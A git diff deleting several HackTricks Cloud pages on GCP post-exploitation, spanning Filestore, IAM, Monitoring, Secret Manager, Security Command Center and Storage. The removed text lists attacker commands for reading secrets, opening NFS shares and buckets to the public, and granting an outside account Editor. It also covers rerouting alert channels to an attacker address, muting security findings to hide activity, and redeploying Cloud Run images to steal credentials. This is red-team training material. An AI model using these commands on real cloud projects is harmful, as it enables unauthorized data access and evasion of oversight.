--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - Artifact Registry Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Artifact Registry
-
-For more information about Artifact Registry check:
-
-{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %}
-[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md)
-{% endcontent-ref %}
-
-### Privesc
-
-The Post Exploitation and Privesc techniques of Artifact Registry were mixed in:
-
-{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %}
-[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
deleted file mode 100644
index 7fc7b5f47..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
+++ /dev/null
@@ -1,56 +0,0 @@
-# GCP - Cloud Build Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### `cloudbuild.builds.approve` - -With this permission you can approve the execution of a **codebuild that require approvals**. - -```bash -# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve -curl -X POST \ - -H "Authorization: Bearer $(gcloud auth print-access-token)" \ - -H "Content-Type: application/json" \ - -d '{{ - "approvalResult": { - object (ApprovalResult) - } - }' \ - "https://cloudbuild.googleapis.com/v1/projects//locations//builds/:approve" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
deleted file mode 100644
index 0e6bdccac..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# GCP - Cloud Run Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud Run
-
-For more information about Cloud Run check:
-
-{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %}
-[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md)
-{% endcontent-ref %}
-
-### Access the images
-
-If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables.
-
-If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service.
-
-### Modify & redeploy the image
-
-Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
deleted file mode 100644
index 037d748cf..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
+++ /dev/null
@@ -1,130 +0,0 @@
-# GCP - Filestore Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Filestore - -For more information about Filestore check: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Mount Filestore - -A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**: - -{% code overflow="wrap" %} -```bash -sudo apt-get update -sudo apt-get install nfs-common -# Check the share name -showmount -e -# Mount the share -mkdir /mnt/fs -sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs -``` -{% endcode %} - -To find the IP address of a filestore insatnce check the enumeration section of the page: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Remove Restrictions and get extra permissions - -If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. 
It's also possible to grant more privileges over your IP address to have admin access over the share: - -```bash -gcloud filestore instances update nfstest \ - --zone= \ - --flags-file=nfs.json - -# Contents of nfs.json -{ - "--file-share": - { - "capacity": "1024", - "name": "", - "nfs-export-options": [ - { - "access-mode": "READ_WRITE", - "ip-ranges": [ - "/32" - ], - "squash-mode": "NO_ROOT_SQUASH", - "anon_uid": 1003, - "anon_gid": 1003 - } - ] - } -} -``` - -### Restore a backup - -If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:** - -```bash -# Create a new filestore if you don't want to modify the old one -gcloud filestore instances create \ - --zone= \ - --tier=STANDARD \ - --file-share=name=vol1,capacity=1TB \ - --network=name=default,reserved-ip-range=10.0.0.0/29 - -# Restore a backups in a new instance -gcloud filestore instances restore \ - --zone= \ - --file-share= \ - --source-backup= \ - --source-backup-region= - -# Follow the previous section commands to mount it -``` - -### Create a backup and restore it - -If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned: - -{% code overflow="wrap" %} -```bash -# Create share backup -gcloud filestore backups create \ - --region= \ - --instance= \ - --instance-zone= \ - --file-share= - -# Follow the previous section commands to restore it and mount it -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
deleted file mode 100644
index 4181accdc..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# GCP - IAM Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## IAM
-
-You can find further information about IAM in:
-
-{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
-[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
-{% endcontent-ref %}
-
-### Granting access to management console
-
-Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
-
-To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor.
-
-You can use the following command to **grant a user the primitive role of Editor** to your existing project:
-
-{% code overflow="wrap" %}
-```bash
-gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
-```
-{% endcode %}
-
-If you succeeded here, try **accessing the web interface** and exploring from there.
-
-This is the **highest level you can assign using the gcloud tool**.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
deleted file mode 100644
index d1ec7ef27..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
+++ /dev/null
@@ -1,146 +0,0 @@
-# GCP - Monitoring Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Monitoring - -Fore more information check: - -{% content-ref url="../gcp-services/gcp-monitoring-enum.md" %} -[gcp-monitoring-enum.md](../gcp-services/gcp-monitoring-enum.md) -{% endcontent-ref %} - -For other ways to disrupt logs check: - -{% content-ref url="gcp-logging-post-exploitation.md" %} -[gcp-logging-post-exploitation.md](gcp-logging-post-exploitation.md) -{% endcontent-ref %} - -### `monitoring.alertPolicies.delete` - -Delete an alert policy: - -```bash -gcloud alpha monitoring policies delete -``` - -### `monitoring.alertPolicies.update` - -Disrupt an alert policy: - -```bash -# Disable policy -gcloud alpha monitoring policies update --no-enabled - -# Remove all notification channels -gcloud alpha monitoring policies update --clear-notification-channels - -# Chnage notification channels -gcloud alpha monitoring policies update --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL - -# Modify alert conditions -gcloud alpha monitoring policies update --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... 
}" -# or use --policy-from-file -``` - -### `monitoring.dashboards.update` - -Modify a dashboard to disrupt it: - -```bash -# Disrupt dashboard -gcloud monitoring dashboards update --config=''' - displayName: New Dashboard with New Display Name - etag: 40d1040034db4e5a9dee931ec1b12c0d - gridLayout: - widgets: - - text: - content: Hello World - ''' -``` - -### `monitoring.dashboards.delete` - -Delete a dashboard: - -```bash -# Delete dashboard -gcloud monitoring dashboards delete -``` - -### `monitoring.snoozes.create` - -Prevent policies from generating alerts by creating a snoozer: - -{% code overflow="wrap" %} -```bash -# Stop alerts by creating a snoozer -gcloud monitoring snoozes create --display-name="Maintenance Week" \ - --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ - --start-time="2023-03-01T03:00:00.0-0500" \ - --end-time="2023-03-07T23:59:59.5-0500" -``` -{% endcode %} - -### `monitoring.snoozes.update` - -Update the timing of a snoozer to prevent alerts from being created when the attacker is interested: - -{% code overflow="wrap" %} -```bash -# Modify the timing of a snooze -gcloud monitoring snoozes update --start-time=START_TIME --end-time=END_TIME - -# odify everything, including affected policies -gcloud monitoring snoozes update --snooze-from-file= -``` -{% endcode %} - -### `monitoring.notificationChannels.delete` - -Delete a configured channel: - -```bash -# Delete channel -gcloud alpha monitoring channels delete -``` - -### `monitoring.notificationChannels.update` - -Update labels of a channel to disrupt it: - -{% code overflow="wrap" %} -```bash -# Delete or update labels, for example email channels have the email indicated here -gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels -gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS 
Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
deleted file mode 100644
index d6be15c5f..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# GCP - Secretmanager Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Secretmanager
-
-For more information about Secret Manager check:
-
-{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %}
-[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md)
-{% endcontent-ref %}
-
-### `secretmanager.versions.access`
-
-This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
-
-```bash
-# Get clear-text of version 1 of secret: ""
-gcloud secrets versions access 1 --secret=""
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
deleted file mode 100644
index 745566afa..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
+++ /dev/null
@@ -1,94 +0,0 @@
-# GCP - Security Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Security
-
-For more information check:
-
-{% content-ref url="../gcp-services/gcp-security-enum.md" %}
-[gcp-security-enum.md](../gcp-services/gcp-security-enum.md)
-{% endcontent-ref %}
-
-### `securitycenter.muteconfigs.create`
-
-Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
-
-{% code overflow="wrap" %}
-```bash
-# Create Muteconfig
-gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
-```
-{% endcode %}
-
-### `securitycenter.muteconfigs.update`
-
-Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
-
-{% code overflow="wrap" %}
-```bash
-# Update Muteconfig
-gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
-```
-{% endcode %}
-
-### `securitycenter.findings.bulkMuteUpdate`
-
-Mute findings based on a filer:
-
-{% code overflow="wrap" %}
-```bash
-# Mute based on a filter
-gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
-```
-{% endcode %}
-
-A muted finding won't appear in the SCC dashboard and reports.
-
-### `securitycenter.findings.setMute`
-
-Mute findings based on source, findings...
-
-{% code overflow="wrap" %}
-```bash
-gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
-```
-{% endcode %}
-
-### `securitycenter.findings.update`
-
-Update a finding to indicate erroneous information:
-
-{% code overflow="wrap" %}
-```bash
-gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
-```
-{% endcode %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
deleted file mode 100644
index 8f1ee1317..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# GCP - Storage Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud Storage
-
-For more information about CLoud Storage check this page:
-
-{% content-ref url="../gcp-services/gcp-storage-enum.md" %}
-[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md)
-{% endcontent-ref %}
-
-### Give Public Access
-
-It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket:
-
-```bash
-# Disable public prevention
-gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
-
-# Make all objects in a bucket public
-gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer
-## I don't think you can make specific objects public just with IAM
-
-# Make a bucket or object public (via ACL)
-gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER
-gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
-```
-
-If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
-
-To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/`
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
deleted file mode 100644
index af354beb0..000000000
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - Workflows Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Workflow
-
-Basic information:
-
-{% content-ref url="../gcp-services/gcp-workflows-enum.md" %}
-[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md)
-{% endcontent-ref %}
-
